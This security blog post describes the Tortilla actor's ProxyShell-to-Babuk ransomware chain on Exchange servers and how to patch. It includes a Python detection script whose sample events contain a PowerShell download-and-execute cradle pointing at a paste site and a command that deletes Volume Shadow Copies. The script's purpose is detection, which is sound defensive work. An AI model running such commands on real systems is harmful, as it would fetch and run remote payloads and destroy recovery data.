‘Tortilla’ Attacking Microsoft Exchange Servers with Babuk Ransomware

Summary: A new threat actor identified as 'Tortilla' is targeting Microsoft Exchange Servers with known ProxyShell (authentication bypass) vulnerabilities to spread and infect the servers with Babuk ransomware. The threat actor has been targeting organizations based in the U.S., Germany, Brazil, Thailand, and the U.K. In this blog, we've discussed the Babuk ransomware in detail and mentioned the steps to protect your vulnerable Exchange Server from such malicious attacks.

Tortilla, a new threat actor, is targeting organizations with unpatched Exchange Servers vulnerable to ProxyShell attacks. The threat actor uses the China Chopper web shell to spread the Babuk ransomware and demands a $10,000 ransom in XMR (Monero) cryptocurrency to decrypt the data encrypted by the ransomware.

Tortilla's ransom note:

[Image: Tortilla's ransom note. Source: Cisco]

What is Babuk Ransomware?

Babuk ransomware is a new ransomware discovered in early 2021 after it impacted at least 5 major organizations, including the Washington D.C. Police Department. One of them even paid an $85,000 ransom to the threat actors in order to get their data back.

It was only after the source code of the original Babuk ransomware and its builder was leaked on hacking forums that new threat actors and groups, such as Tortilla, began modifying the ransomware and launching their own attacks with it.

Babuk is one of the most infamous ransomware families: it encrypts the targeted Exchange Server, interrupts backups, and deletes Volume Shadow Copies (VSS copies), leaving no option for recovery.

Although the threat actors behind the Babuk ransomware are targeting Exchange Servers across the globe, most of its victims are in the United States. Attacks have also been observed in Germany, Brazil, Thailand, and the United Kingdom. Furthermore, the attacks are expected to increase, as attackers are constantly scanning for vulnerable Exchange Servers via the Autodiscover URL.

How is Tortilla Attacking Vulnerable Exchange Servers with Babuk Ransomware?

ProxyShell is a set of three vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) identified by Microsoft in August 2021. When chained together, these vulnerabilities allow an attacker to bypass authentication, run malicious scripts, install web shells and backdoors, and perform unauthorized remote code execution on the targeted Exchange Server.

Although Microsoft released updates back in April 2021 and May 2021 to patch ProxyShell vulnerabilities, several organizations are still unpatched and vulnerable to ProxyShell attacks.

The threat actor starts the attack by exploiting the ProxyShell vulnerabilities to access the targeted Exchange Server. Once inside, the attacker drops DLL or .NET executable files on the compromised Exchange Server. These files are then loaded by w3wp.exe, the Internet Information Services (IIS) worker process that handles the web requests sent to the Exchange IIS web server. The IIS worker process executes the malicious payload, which in turn runs an evasive PowerShell command that bypasses endpoint protection and issues a web request to download the payload loader called 'tortilla.exe.'

This loader connects to the Pastebin.pl site to download a payload, which is loaded into memory and injected into a .NET Framework process. The injected payload then begins encrypting the server data and mounted drives with Babuk ransomware.
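The chain above, together with the shadow-copy deletion described in the Babuk section, gives a defender three concrete behaviours to alert on: the IIS worker process w3wp.exe spawning a shell, a PowerShell download cradle (or encoded command) reaching a paste site, and a command that deletes Volume Shadow Copies. The Python below is an added example and is not code from the original post or from Cisco. The process-creation events are constructed in the style of Sysmon/4688 telemetry, the pastebin.pl path is a placeholder, and the rule names are my own.

```python
"""Process-telemetry detection rules for the Tortilla/Babuk chain.

Added example; events below are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str   # parent process image name, e.g. "w3wp.exe"
    image: str    # child process image name
    cmdline: str  # child command line


# Shells that should never be children of the IIS worker process on an Exchange server.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Common PowerShell download cradles and the encoded-command switch.
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer)",
    re.IGNORECASE)
ENCODED_CMD = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)
# Paste site named in the post as the loader's payload source.
PASTE_HOST = re.compile(r"pastebin\.pl", re.IGNORECASE)
# Pre-encryption recovery inhibition: shadow copy deletion or storage shrinking.
SHADOW_DELETE = re.compile(
    r"(vssadmin(\.exe)?\s+delete\s+shadows|vssadmin(\.exe)?\s+resize\s+shadowstorage|"
    r"wmic(\.exe)?\s+shadowcopy\s+delete|Win32_ShadowCopy)",
    re.IGNORECASE)

# Constructed sample events (hypothetical hosts EXCH01 and FS01).
SAMPLE_EVENTS = [
    ProcEvent("EXCH01", "w3wp.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('https://pastebin.pl/view/raw/EXAMPLE')\""),  # placeholder URL
    ProcEvent("EXCH01", "cmd.exe", "vssadmin.exe",
              "vssadmin.exe delete shadows /all /quiet"),
    ProcEvent("EXCH01", "explorer.exe", "powershell.exe",
              "powershell.exe -NoProfile -Command Get-Date"),           # benign admin use
    ProcEvent("FS01", "explorer.exe", "notepad.exe",
              "notepad.exe C:\\Users\\alice\\notes.txt"),              # benign
]


def rules_for(ev: ProcEvent) -> List[str]:
    """Return the names of every rule a single event triggers."""
    hits: List[str] = []
    parent, image = ev.parent.lower(), ev.image.lower()
    if parent == "w3wp.exe" and image in SHELLS:
        hits.append("iis_worker_spawns_shell")
    if image in POWERSHELL and (DOWNLOAD_CRADLE.search(ev.cmdline)
                                or ENCODED_CMD.search(ev.cmdline)):
        hits.append("powershell_download_or_encoded")
    if PASTE_HOST.search(ev.cmdline):
        hits.append("paste_site_in_cmdline")
    if SHADOW_DELETE.search(ev.cmdline):
        hits.append("shadow_copy_deletion")
    return hits


def triage(events) -> Dict[str, List[str]]:
    """Map each host to the sorted, de-duplicated set of rules it triggered.

    A host that fires both web-server-born execution and shadow-copy deletion
    is showing the full pre-encryption sequence described in the post.
    """
    findings: Dict[str, set] = {}
    for ev in events:
        for rule in rules_for(ev):
            findings.setdefault(ev.host, set()).add(rule)
    return {host: sorted(rules) for host, rules in findings.items()}


if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(rules)}")
```

Parent/child relationships are the strongest signal here: an Exchange server's w3wp.exe has no legitimate reason to start cmd.exe or PowerShell, so that rule alone is worth a high-severity alert, while the command-line regexes catch the loader and shadow-copy stages even when the parent is already a shell.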

Although Czech cybersecurity firm Avast earlier released a decryptor for Babuk ransomware, it doesn’t work for this Babuk ransomware variant.

The decryptor can decrypt files or data encrypted using the .babuk, .babyk, or .doydo extensions or whose keys were leaked with the Babuk ransomware source code.

How to Protect your Organization from Babuk Ransomware?

According to a report by Shodan, a search engine that lets users search for different types of Internet-connected servers, more than 25,000 Exchange Servers were still unpatched and vulnerable to ProxyShell attacks as of November 9, 2021.

To protect your organization from Babuk ransomware, update the Exchange Server. There is no way around it.

It is highly recommended that you identify the vulnerabilities on your Exchange Server and patch them using the latest Microsoft Cumulative Updates or Security Updates released for supported Exchange Server versions.

You can follow the steps below to identify the vulnerabilities and patch them to safeguard your organization against ProxyShell attacks. First, run the HealthChecker.ps1 script in the Exchange Management Shell (EMS), either for all servers or for a specific server:

# Check all Exchange Servers and build the HTML report
.\HealthChecker.ps1 -BuildHtmlServersReport

# Check a single server (here named Exch01) and build the HTML report
.\HealthChecker.ps1 -Server Exch01 -BuildHtmlServersReport

If the output displays an error or the script does not run, execute the following command in EMS first and then run the HealthChecker.ps1 script again. (The Process scope limits the relaxed execution policy to the current shell session.)

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

This will generate an HTML file. Open this HTML file in any web browser to check the server’s health status, vulnerabilities, and issues.

Then fix the issues and patch the vulnerabilities by downloading and installing the updates released by Microsoft.

Refer to the Exchange Deployment Assistant to learn the steps to update and patch your Exchange Server with the latest CUs and protect it against malicious attacks.

Final Thoughts

The Tortilla threat actor is exploiting ProxyShell vulnerabilities that were patched back in May 2021 by Microsoft. However, there are several thousand organizations that are still not patched and vulnerable to ProxyShell attacks. If your organization is one of those, installing the latest Exchange Server Cumulative and Security Updates is the best defense.

But if you are the unfortunate one whose server is already compromised or crashed after the malicious attack, build a new server and use the backup to restore mailboxes on the new server. You can also use Exchange recovery software, such as Stellar Repair for Exchange, if backups aren’t available, obsolete, or do not work. The software can help you quickly recover mailboxes from the compromised Exchange Server database and restore them to a new Exchange Server or Office 365 tenant in a few clicks.

Never use the compromised server even if it is fixed or working. You can use Microsoft's Exchange On-premises Mitigation Tool (EOMT) to detect whether your server is compromised.
